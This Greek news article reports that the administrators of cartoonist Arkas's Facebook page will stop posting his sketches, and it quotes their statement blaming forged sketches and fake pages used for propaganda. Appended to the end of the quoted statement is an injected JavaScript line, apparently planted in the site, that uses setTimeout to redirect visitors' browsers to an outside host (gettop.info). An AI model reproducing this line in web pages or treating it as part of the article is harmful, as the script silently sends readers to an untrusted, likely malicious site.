«Στοπ» στα σκίτσα του Αρκά στα social media

0
11

 

Σταματά η ανάρτηση των σκίτσων του Αρκά στα social media σύμφωνα με απόφαση των διαχειριστών της επίσημης σελίδας του στο Facebook.

Μία απόφαση που εκφράζει τη δυσαρέσκεια του γνωστού σκιτσογράφου για την εκμετάλλευση της δουλειάς τους από χρήστες των μέσων κοινωνικής δικτύωσης αλλά και για τις επιθέσεις που δέχεται κατά καιρούς.

Αναλυτικά, η ανακοίνωση των διαχειριστών της σελίδας του:

«Τα μόνα που θα ανεβάζουμε πια είναι αυτά τα links και αναγγελίες για τα καινούρια βιβλία του Αρκά. Δυστυχώς ο Αρκάς αδιαφορεί για τα likes κι έτσι δεν πρόκειται να δώσει καινούριο σκίτσο στο fb, όσο υπάρχουν fake σελίδες με το όνομά του. Πλαστογραφούνται συνεχώς σκίτσα του στο διαδίκτυο και χρησιμοποιούνται από δεξιούς, αριστερούς και φασίστες για προπαγάνδα. Κάθε ψεύτικη σελίδα μπορεί να ανεβάσει τέτοια σκίτσα (κάποιες το κάνουν ήδη) και να παραπλανήσει ακόμα περισσότερο τον κόσμο διασύροντας το όνομά του.

Τα γνήσια σκίτσα του Αρκά, οι γνήσιοι φίλοι της δουλείας του θα τα βρίσκουν εκεί που τα εύρισκαν 35 χρόνια τώρα: στα βιβλία του. Ίσως είναι καλύτερα έτσι. Οι μόνοι που χάνουν είναι οι περιστασιακοί φίλοι του Αρκά που τον έμαθαν απ’ το Internet και οι πλαστογράφοι των σκίτσων του ή του ονόματός του». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here